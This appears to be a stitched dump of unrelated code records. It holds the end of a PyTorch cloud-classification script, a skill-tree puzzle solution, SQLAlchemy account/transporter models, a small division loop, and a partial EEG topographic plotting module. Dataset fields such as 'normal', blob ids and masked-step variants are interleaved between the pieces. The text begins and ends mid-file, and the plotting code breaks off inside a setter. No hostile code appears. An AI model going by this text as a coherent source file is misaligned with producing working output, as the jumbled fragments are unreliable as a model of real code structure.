print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\nfileDir = os.getcwd()\ninput_size = 65536\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\ntrain_num = 1000\ntest_num = 148\nimages = []\nfor file in glob.glob('*.jpg'):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6:-4]))\ntrain_images = []\ntest_images = []\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv('./train_v2.csv')\nfor i in range(train_num + test_num):\n tags = labels.iloc[i]['tags']\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int('cloudy' not in tags and 'haze' not in tags))\n\n\nclass Net(nn.Module):\n\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n self.h1 = nn.Linear(input_size, hidden_size)\n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes)\n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n\nmodel = Net(input_size, hidden_size, num_classes)\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images):\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n loss = criterion(outputs, label)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if (i + 1) % 100 == 0:\n print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +\n 1, num_epochs, i + 1, total_step, loss.item()))\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0:\n print('#############')\n print(i, outputs, torch.sum(label))\n print('Accuracy of the network on the {} test images: {} %'.format(len(\n test_images), 100 * correct / len(test_images)))\ntorch.save(model.state_dict(), 'model.ckpt')\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport imageio\nimport pandas as pd\nimport glob, os\nimport numpy as np\n\nfileDir = os.getcwd()\n# os.chdir(\"./train-jpg\")\n\n# there are 40480 training examples\n# we will allocate 39000 for training\n# and the remaining 1480 will be for validation\n\ninput_size = 65536 # 256^2\nhidden_size = 20\nhidden_size_1 = 15\nhidden_size_2 = 10\nhidden_size_3 = 5\nnum_classes = 1\nlearning_rate = 0.001\nnum_epochs = 5\n\ntrain_num = 1000\ntest_num = 148\n\n# train_num = 39000\n# test_num = 1480\n\n# %% Load data--for clouds and non-clouds\nimages = []\n\nfor file in glob.glob(\"*.jpg\"):\n images.append(file)\nimages = sorted(images, key=lambda filename: int(filename[6: -4])) # string splicing so that the images are in order\n\ntrain_images = []\ntest_images = []\n\ntrain_labels = []\ntest_labels = []\nlabels = pd.read_csv(\"./train_v2.csv\") # labels are whether or not image is any sort of cloudy or haze\n\nfor i in range(train_num + test_num):\n tags = labels.iloc[i][\"tags\"]\n if i < train_num:\n train_images.append(imageio.imread(images[i], as_gray=True).flatten())\n train_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # train_labels.append(int(\"water\" not in tags))\n else:\n test_images.append(imageio.imread(images[i], as_gray=True).flatten())\n test_labels.append(int(\"cloudy\" not in tags and \"haze\" not in tags))\n # test_labels.append(int(\"water\" not in tags))\n \nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, num_classes):\n super(Net, self).__init__()\n \n # parameters\n \n # weights\n # self.h1 = nn.Sigmoid() # input_size, hidden_size\n # self.o = nn.Sigmoid() # hidden_size, num_classes\n\n self.h1 = nn.Linear(input_size, hidden_size) \n self.h2 = nn.Linear(hidden_size, hidden_size_1)\n self.h3 = nn.Linear(hidden_size_1, hidden_size_2)\n self.h4 = nn.Linear(hidden_size_2, hidden_size_3)\n self.o = nn.Linear(hidden_size_3, num_classes) \n\n def forward(self, x):\n x = torch.sigmoid(self.h1(x))\n # print(\"doing x: {}\".format(x.shape))\n x = torch.sigmoid(self.h2(x))\n x = torch.sigmoid(self.h3(x))\n x = torch.sigmoid(self.h4(x))\n x = torch.sigmoid(self.o(x))\n return x\n\n# %%\n\nmodel = Net(input_size, hidden_size, num_classes) # no device configuration here\ncriterion = nn.SoftMarginLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) \n# model = TheModelClass(*args, **kwargs)\n# model.load_state_dict(torch.load(\"model.ckpt\"))\n# model.eval()\n# optimizer = TheOptimizerClass(*args, **kwargs)\n\n# checkpoint = torch.load('./model.ckpt')\n# model.load_state_dict(checkpoint['model_state_dict'])\n# optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n# epoch = checkpoint['epoch']\n# loss = checkpoint['loss']\n\n\ntotal_step = len(train_images)\nfor epoch in range(num_epochs):\n for i, image in enumerate(train_images): \n\n image = torch.Tensor(train_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(train_labels[i])])\n # label = label.long()\n # label = label.reshape(1,1)\n # label = label.squeeze()\n \n # Forward pass\n outputs = model(image)\n outputs = outputs.squeeze(0)\n # outputs.reshape(1,)\n loss = criterion(outputs, label)\n \n # Backward and optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n if (i+1) % 100 == 0:\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\n\n\n# %%\n\nwith torch.no_grad():\n correct = 0\n total = 0\n for i, image in enumerate(test_images):\n image = torch.Tensor(test_images[i]).reshape(1, 65536)\n label = torch.Tensor([int(test_labels[i])])\n outputs = model(image)\n outputs = outputs.squeeze(0)\n outputs = 1 if torch.sum(outputs) >= 0.5 else 0\n if outputs == torch.sum(label):\n correct += 1\n elif outputs == 0: \n print(\"#############\")\n print(i,outputs, torch.sum(label))\n # _, predicted = torch.max(outputs.data, 1)\n # correct += (predicted == labels).sum().item()\n\n print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))\n\n\n\n# %%\n\ntorch.save(model.state_dict(), 'model.ckpt')\n\n# %%\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
def solution(skill, skill_trees):
answer = 0
for tree in skill_trees:
able = True
for i in range(len(skill) - 1, 0, -1):
index = tree.find(skill[i])
if index != -1 and i > 0:
if tree[:index].find(skill[i - 1]) == -1:
able = False
break
if able:
answer += 1
return answer
if __name__ == "__main__":
skill = "CBD"
skill_trees = ["BACDE", "CBADF", "AECB", "BDA"]
solution(skill=skill, skill_trees=skill_trees)
|
normal
|
{
"blob_id": "a72d878d246a459038640bf9c1deff562994b345",
"index": 7338,
"step-1": "<mask token>\n",
"step-2": "def solution(skill, skill_trees):\n answer = 0\n for tree in skill_trees:\n able = True\n for i in range(len(skill) - 1, 0, -1):\n index = tree.find(skill[i])\n if index != -1 and i > 0:\n if tree[:index].find(skill[i - 1]) == -1:\n able = False\n break\n if able:\n answer += 1\n return answer\n\n\n<mask token>\n",
"step-3": "def solution(skill, skill_trees):\n answer = 0\n for tree in skill_trees:\n able = True\n for i in range(len(skill) - 1, 0, -1):\n index = tree.find(skill[i])\n if index != -1 and i > 0:\n if tree[:index].find(skill[i - 1]) == -1:\n able = False\n break\n if able:\n answer += 1\n return answer\n\n\nif __name__ == '__main__':\n skill = 'CBD'\n skill_trees = ['BACDE', 'CBADF', 'AECB', 'BDA']\n solution(skill=skill, skill_trees=skill_trees)\n",
"step-4": "def solution(skill, skill_trees):\n answer = 0\n \n for tree in skill_trees:\n able = True\n for i in range(len(skill) - 1, 0, -1):\n index = tree.find(skill[i])\n if index != -1 and i > 0:\n if tree[:index].find(skill[i - 1]) == -1:\n able = False\n break\n if able: \n answer += 1\n \n return answer\n\nif __name__ == \"__main__\":\n skill = \"CBD\"\n skill_trees\t= [\"BACDE\", \"CBADF\", \"AECB\", \"BDA\"]\t\n solution(skill=skill, skill_trees=skill_trees)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from .. import db
class Account(db.Model):
id = db.Column(db.Integer, primary_key=True)
acc = db.Column(db.String(50), unique=True)#TODO 调整长度
pwd = db.Column(db.String(50))#TODO 调整长度
name = db.Column(db.String(20))
sex = db.Column(db.SmallInteger)
idno = db.Column(db.String(20))
phone = db.Column(db.String(20))
crttime = db.Column(db.TIMESTAMP)
crtip = db.Column(db.String(50))
crtmac = db.Column(db.String(50))
crtplat = db.Column(db.SmallInteger)
crtrole = db.Column(db.SmallInteger)
lasttime = db.Column(db.TIMESTAMP)
lastip = db.Column(db.String(50))
lastmac = db.Column(db.String(50))
lastplat = db.Column(db.SmallInteger)
lastrole = db.Column(db.SmallInteger)
transporter = db.relationship('Transporter', uselist=False)
consignor = db.relationship('Consignor', uselist=False)
def __init__(self, acc, pwd):
self.acc = acc
self.pwd = pwd
def __repr__(self):
return '<Account %s %s>'%(str(self.id), self.acc)
class Transporter(db.Model):
id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)
d_lic = db.Column(db.String(50)) #TODO 长度
v_lic = db.Column(db.String(50))
account = db.relationship('Account', uselist=False)
def __init__(self):
pass
def __repr__(self):
return '<Transporter %s>'%str(self.id)
class Consignor(db.Model):
id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)
account = db.relationship('Account', uselist=False)
indents = db.relationship('Indent', lazy='dynamic')
def __init__(self):
pass
def __repr__(self):
return '<Consignor %s>'%str(self.id)
class Convoy(db.Model):
id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)
account = db.relationship('Account', uselist=False)
def __init__(self):
pass
def __repr__(self):
return '<Convoy %s>'%str(self.id)
|
normal
|
{
"blob_id": "b6824251b1165ca6c66049d40c79fccee6bc7d3a",
"index": 159,
"step-1": "<mask token>\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-2": "<mask token>\n\n\nclass Account(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Account %s %s>' % (str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50))\n v_lic = db.Column(db.String(50))\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>' % str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-3": "<mask token>\n\n\nclass Account(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, acc, pwd):\n self.acc = acc\n self.pwd = pwd\n\n def __repr__(self):\n return '<Account %s %s>' % (str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50))\n v_lic = db.Column(db.String(50))\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>' % str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-4": "<mask token>\n\n\nclass Account(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n acc = db.Column(db.String(50), unique=True)\n pwd = db.Column(db.String(50))\n name = db.Column(db.String(20))\n sex = db.Column(db.SmallInteger)\n idno = db.Column(db.String(20))\n phone = db.Column(db.String(20))\n crttime = db.Column(db.TIMESTAMP)\n crtip = db.Column(db.String(50))\n crtmac = db.Column(db.String(50))\n crtplat = db.Column(db.SmallInteger)\n crtrole = db.Column(db.SmallInteger)\n lasttime = db.Column(db.TIMESTAMP)\n lastip = db.Column(db.String(50))\n lastmac = db.Column(db.String(50))\n lastplat = db.Column(db.SmallInteger)\n lastrole = db.Column(db.SmallInteger)\n transporter = db.relationship('Transporter', uselist=False)\n consignor = db.relationship('Consignor', uselist=False)\n\n def __init__(self, acc, pwd):\n self.acc = acc\n self.pwd = pwd\n\n def __repr__(self):\n return '<Account %s %s>' % (str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50))\n v_lic = db.Column(db.String(50))\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>' % str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>' % str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>' % str(self.id)\n",
"step-5": "from .. import db\n\n\nclass Account(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n acc = db.Column(db.String(50), unique=True)#TODO 调整长度\n pwd = db.Column(db.String(50))#TODO 调整长度\n name = db.Column(db.String(20))\n sex = db.Column(db.SmallInteger)\n idno = db.Column(db.String(20))\n phone = db.Column(db.String(20))\n crttime = db.Column(db.TIMESTAMP)\n crtip = db.Column(db.String(50))\n crtmac = db.Column(db.String(50))\n crtplat = db.Column(db.SmallInteger)\n crtrole = db.Column(db.SmallInteger)\n lasttime = db.Column(db.TIMESTAMP)\n lastip = db.Column(db.String(50))\n lastmac = db.Column(db.String(50))\n lastplat = db.Column(db.SmallInteger)\n lastrole = db.Column(db.SmallInteger)\n\n transporter = db.relationship('Transporter', uselist=False)\n consignor = db.relationship('Consignor', uselist=False)\n\n def __init__(self, acc, pwd):\n self.acc = acc\n self.pwd = pwd\n\n def __repr__(self):\n return '<Account %s %s>'%(str(self.id), self.acc)\n\n\nclass Transporter(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n d_lic = db.Column(db.String(50)) #TODO 长度\n v_lic = db.Column(db.String(50))\n\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Transporter %s>'%str(self.id)\n\n\nclass Consignor(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n\n account = db.relationship('Account', uselist=False)\n indents = db.relationship('Indent', lazy='dynamic')\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Consignor %s>'%str(self.id)\n\n\nclass Convoy(db.Model):\n id = db.Column(db.Integer, db.ForeignKey('account.id'), primary_key=True)\n\n account = db.relationship('Account', uselist=False)\n\n def __init__(self):\n pass\n\n def __repr__(self):\n return '<Convoy %s>'%str(self.id)\n",
"step-ids": [
8,
14,
15,
16,
18
]
}
|
[
8,
14,
15,
16,
18
] |
# coding=utf-8
while True:
a,b=input().split()
a=float(a)
b=float(b)
if b==0:
print("error")
else:
c=a/b+0.5
c=int(c)
print(c)
|
normal
|
{
"blob_id": "dab5e7ee1d14cba485cbaece1354ec8d686ca4ab",
"index": 9080,
"step-1": "<mask token>\n",
"step-2": "while True:\n a, b = input().split()\n a = float(a)\n b = float(b)\n if b == 0:\n print('error')\n else:\n c = a / b + 0.5\n c = int(c)\n print(c)\n",
"step-3": "# coding=utf-8\nwhile True:\n a,b=input().split()\n a=float(a)\n b=float(b)\n if b==0:\n print(\"error\")\n else:\n c=a/b+0.5\n c=int(c)\n print(c)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python
"""
Plot EEG data.
Usage:
plotting.py [options] [<file>]
Options:
-h --help Show this screen.
--version Show version.
--center Center the data before plotting
--sample-index=N Row index (indexed from one).
--transpose Transpose data.
--xlim=lim X-axis limits.
Data
----
ELECTRODES : dict
Dictionary indexed by electrode name with 2D positions as values
References
----------
The five percent electrode system for high-resolution EEG and ERP
measurement, Robert Oostenveld, Peter Praamstra.
"""
from __future__ import absolute_import, division, print_function
from math import cos, pi, sin
import matplotlib.lines as lines
import matplotlib.pyplot as plt
import matplotlib.transforms as transforms
import numpy as np
import pandas as pd
from scipy.interpolate import griddata
__all__ = ('ELECTRODES', 'MultiPlot', 'TopoPlot', 'topoplot')
ELECTRODES = {
'AF3': (-0.25, 0.62),
'AF4': (0.25, 0.62),
'AF7': (0.8 * cos(0.7 * pi), 0.8 * sin(0.7 * pi)),
'AF8': (0.8 * cos(0.3 * pi), 0.8 * sin(0.3 * pi)),
'AFz': (0, 0.6),
'C1': (-0.2, 0),
'C2': (0.2, 0),
'C3': (-0.4, 0),
'C4': (0.4, 0),
'C5': (-0.6, 0),
'C6': (0.6, 0),
'CP1': (-0.18, -0.2),
'CP2': (0.18, -0.2),
'CP3': (-0.36, 0.4 * sin(1.17 * pi)),
'CP4': (0.36, 0.4 * sin(1.83 * pi)),
'CP5': (0.6 * cos(1.12 * pi), 0.6 * sin(1.12 * pi)),
'CP6': (0.6 * cos(1.88 * pi), 0.6 * sin(1.88 * pi)),
'CPz': (0, -0.2),
'Cz': (0, 0),
'F1': (-0.18, 0.4),
'F2': (0.18, 0.4),
'F3': (-0.35, 0.41),
'F4': (0.35, 0.41),
'F5': (-0.5, 0.43),
'F6': (0.5, 0.43),
'F7': (0.8 * cos(0.8 * pi), 0.8 * sin(0.8 * pi)),
'F8': (0.8 * cos(0.2 * pi), 0.8 * sin(0.2 * pi)),
'FC1': (-0.2, 0.21),
'FC2': (0.2, 0.21),
'FC3': (-0.39, 0.22),
'FC4': (0.39, 0.22),
'FC5': (-0.57, 0.23),
'FC6': (0.57, 0.23),
'FCz': (0, 0.2),
'FP1': (0.8 * cos(0.6 * pi), 0.8 * sin(0.6 * pi)),
'FP2': (0.8 * cos(0.4 * pi), 0.8 * sin(0.4 * pi)),
'Fpz': (0, 0.8),
'FT7': (0.8 * cos(0.9 * pi), 0.8 * sin(0.9 * pi)),
'FT8': (0.8 * cos(0.1 * pi), 0.8 * sin(0.1 * pi)),
'Fz': (0, 0.4),
'Iz': (0, -1),
'Nz': (0, 1),
'P1': (-0.18, -0.41),
'P2': (0.18, -0.41),
'P3': (-0.35, -0.42),
'P4': (0.35, -0.42),
'P5': (-0.5, -0.44),
'P6': (0.5, -0.44),
'P7': (0.8 * cos(1.2 * pi), 0.8 * sin(1.2 * pi)),
'P8': (0.8 * cos(1.8 * pi), 0.8 * sin(1.8 * pi)),
'PO3': (-0.24, -0.62),
'PO4': (0.24, -0.62),
'PO7': (0.8 * cos(1.3 * pi), 0.8 * sin(1.3 * pi)),
'PO8': (0.8 * cos(1.7 * pi), 0.8 * sin(1.7 * pi)),
'POz': (0, -0.6),
'Pz': (0, -0.4),
'O1': (0.8 * cos(1.4 * pi), 0.8 * sin(1.4 * pi)),
'O2': (0.8 * cos(1.6 * pi), 0.8 * sin(1.6 * pi)),
'Oz': (0, -0.8),
'T7': (-0.8, 0),
'T8': (0.8, 0),
'T9': (-1, 0),
'T10': (1, 0),
'TP7': (0.8 * cos(1.1 * pi), 0.8 * sin(1.1 * pi)),
'TP8': (0.8 * cos(1.9 * pi), 0.8 * sin(1.9 * pi)),
'TP9': (cos(1.1 * pi), sin(1.1 * pi)),
'TP10': (cos(1.9 * pi), sin(1.9 * pi)),
}
class TopoPlot(object):
"""Topographic plot."""
def __init__(self, data=None, axes=None):
"""Setup defaults.
Parameters
----------
data : Pandas.Series or dict
Pandas Series with values indexed by electrodes.
axes : matplotlib.axes.AxesSubplot object
Axis object to render on.
"""
if axes is None:
self.figure = plt.figure()
axes = self.figure.gca()
else:
self.figure = axes.get_figure()
self.axes = axes
self.center = np.array((0, 0))
if isinstance(data, dict):
self.data = pd.Series(data)
elif isinstance(data, pd.Series):
self.data = data
elif data is None:
self.data = None
else:
raise ValueError("Wrong type of value for 'data': {}".format(
type(data)))
@staticmethod
def normalize_electrode_name(name):
"""Normalize electrode name.
Parameters
----------
name : str
Name of electrode to be normalized
Examples
--------
>>> TopoPlot.normalize_electrode_name('fpz')
'Fpz'
>>> TopoPlot.normalize_electrode_name('AFZ')
'AFz'
"""
return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')
def draw_electrodes(self):
"""Draw electrodes."""
for electrode, position in ELECTRODES.items():
circle = plt.Circle(self.center + position,
radius=0.04, fill=True,
facecolor=(1, 1, 1))
self.axes.add_patch(circle)
position = self.center + position
self.axes.text(position[0], position[1], electrode,
verticalalignment='center',
horizontalalignment='center',
size=6)
def draw_head(self):
"""Draw outer head."""
circle = plt.Circle(self.center, radius=1, fill=False)
self.axes.add_patch(circle)
def draw_inner_head(self):
"""Draw inner head."""
circle = plt.Circle(self.center, radius=0.8, fill=False)
self.axes.add_patch(circle)
def draw_nose(self):
"""Draw nose."""
nose = plt.Line2D([sin(-0.1), 0, sin(0.1)],
[cos(-0.1), 1.1, cos(0.1)],
color=(0, 0, 0))
self.axes.add_line(nose)
def draw_data(self, method='linear', number_of_contours=10):
"""Draw countours from provided data."""
if self.data is not None:
# Coordinates for points to interpolate to
xi, yi = np.mgrid[-1:1:100j, -1:1:100j]
# Electrode positions for data to interpolate from
points = []
for electrode in self.data.index:
name = TopoPlot.normalize_electrode_name(electrode)
points.append(ELECTRODES[name])
# Interpolate
# TODO: Will not work with 2 electrodes.
zi = griddata(points, self.data.values, (xi, yi), method=method)
# Defaults
if number_of_contours is None:
number_of_contours = 10
# Draw
plt.contourf(xi, yi, zi, number_of_contours)
# TODO: center
def draw(self, title=None, method='linear', number_of_contours=None):
"""Draw all components in topoplot including the data.
Parameters
----------
title : str, optional
Title to put on the plot
methods : str, optional
Interpolation method
number_of_contours : int
Number of contours in the colored plot.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}
>>> plt.ion()
>>> topo_plot = TopoPlot(data)
>>> topo_plot.draw()
"""
self.draw_head()
self.draw_inner_head()
self.draw_electrodes()
self.draw_nose()
self.draw_data(method=method, number_of_contours=number_of_contours)
self.axes.axis((-1.2, 1.2, -1.2, 1.2))
self.axes.axis('equal')
if title is not None:
self.axes.set_title(title)
class MultiPlot(TopoPlot):
"""Multiple plots organized topographically.
References
----------
http://www.fieldtriptoolbox.org/reference/ft_multiploter
"""
def __init__(self, data=None, axes=None, xlim=None, ylim=None):
"""Setup defaults.
Parameters
----------
data : Pandas.DataFrame
Pandas DataFrame with values indexed by electrodes.
axes : matplotlib.axes.AxesSubplot object
Axis object to render on.
"""
if axes is None:
self.figure = plt.figure()
axes = self.figure.gca()
else:
self.figure = axes.get_figure()
self.axes = axes
# Contains a list of axes used to plot data data from individual
# electrodes
self._subaxes = []
self.xlim = xlim
self.ylim = ylim
self.center = np.array((0, 0))
if isinstance(data, pd.DataFrame):
self.data = data
elif data is None:
self.data = None
else:
raise ValueError("Wrong type of value for 'data': {}".format(
type(data)))
def add_subplot_axes(self, ax, rect, axis_bgcolor=None):
"""Add subaxes to currect specified axes.
References
----------
Pablo https://stackoverflow.com/users/2309442/pablo
Pablo's answer to "Embedding small plots inside subplots in matplotlib"
https://stackoverflow.com/questions/17458580/
"""
# Modified from
# https://stackoverflow.com/questions/17458580/
box = ax.get_position()
width, height = box.width, box.height
subaxes_box = [(rect[0], rect[1]),
(rect[0] + rect[2], rect[1] + rect[3])]
subaxes_display_coords = ax.transData.transform(subaxes_box)
trans_figure = self.figure.transFigure.inverted()
subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)
x, y = subaxes_figure_coords[0, :]
width, height = (subaxes_figure_coords[1, :] -
subaxes_figure_coords[0, :])
subaxes = self.figure.add_axes(
[x, y, width, height], axis_bgcolor=axis_bgcolor)
x_labelsize = subaxes.get_xticklabels()[0].get_size()
y_labelsize = subaxes.get_yticklabels()[0].get_size()
x_labelsize *= rect[2] ** 0.5
y_labelsize *= rect[3] ** 0.5
subaxes.xaxis.set_tick_params(labelsize=x_labelsize)
subaxes.yaxis.set_tick_params(labelsize=y_labelsize)
return subaxes
def draw_data(self, type='plot', width=None, height=None,
xlim=None, ylim=None,
vmin=None, vmax=None,
axis=False, yscale='linear'):
"""Draw data.
Parameters
----------
type : 'plot', 'spectrogram', optional
Type of plot
xlim : 2-tuple of floats, optional
X-axis limits
ylim : 2-tuple of floats, optional
Y-axis limits
vmin : float, optional
Minimum value for spectrogram colormap
vmax : float, optional
Maximum value for spectrogram colormap
axis : bool, optional
Determine whether the axis should be shown
"""
if self.data is not None:
if ylim is None:
if self.ylim is None and type != 'spectrogram':
ylim = self.auto_ylim(xlim, yscale=yscale)
else:
ylim = self.ylim
if xlim is None:
xlim = self.xlim
if vmin is None:
vmin = 0
# Determine a suitable width for subaxes
number_of_electrodes = len([
electrode
for electrode in self.data.columns
if electrode in ELECTRODES])
if width is None:
if number_of_electrodes > 32:
width = 0.15
else:
width = 0.25
if height is None:
height = 0.25
for electrode in self.data.columns:
if electrode in ELECTRODES:
# Axes and position
x, y = ELECTRODES[electrode]
subaxes = self.add_subplot_axes(
self.axes,
[x - width / 2, y - height / 2, width, height],
axis_bgcolor='w')
# Actual data plot
if type == 'plot':
self.data.ix[:, electrode].plot(
ax=subaxes, xlim=xlim, ylim=ylim)
if not axis:
# x-axis
trans = transforms.blended_transform_factory(
subaxes.transAxes, subaxes.transData)
line = lines.Line2D(
(0, 1), (0, 0),
transform=trans, color=(0, 0, 0))
subaxes.add_line(line)
trans = transforms.blended_transform_factory(
subaxes.transAxes, subaxes.transAxes)
line = lines.Line2D(
(0, 0), (0, 1),
transform=trans, color=(0, 0, 0))
subaxes.add_line(line)
elif type == 'spectrogram':
spectrum, frequencies, midpoints, axes = plt.specgram(
self.data.ix[:, electrode],
Fs=self.data.sampling_rate,
vmin=vmin,
vmax=vmax,
axes=subaxes)
# Adjust axis around spectrogram image.
if xlim is None:
xlim = midpoints[0], midpoints[-1]
subaxes.set_xlim(xlim)
if ylim is None:
ylim = frequencies[0], frequencies[-1]
subaxes.set_ylim(ylim)
else:
raise ValueError("Wrong value for 'type' argument")
if not axis:
subaxes.set_axis_off()
# Annotation
# http://matplotlib.org/users/transforms_tutorial.html
subaxes.text(0.5, 0.95, electrode,
transform=subaxes.transAxes,
fontweight='bold', va='top', ha='center')
subaxes.set_yticklabels([])
subaxes.set_xticklabels([])
self._subaxes.append(subaxes)
@property
def xlim(self):
"""Return xlim for subplots."""
lim = [ax.get_xlim() for ax in self._subaxes]
if lim == []:
lim = None
return lim
@xlim.setter
def xlim(self, left=None, right=None):
"""Set x-axis limits on all subplots."""
for ax in self._subaxes:
ax.set_xlim(left, right)
self.figure.canvas.draw()
@property
def ylim(self):
"""Return ylim for subplots."""
lim = [ax.get_ylim() for ax in self._subaxes]
if lim == []:
lim = None
return lim
@ylim.setter
def ylim(self, bottom=None, top=None):
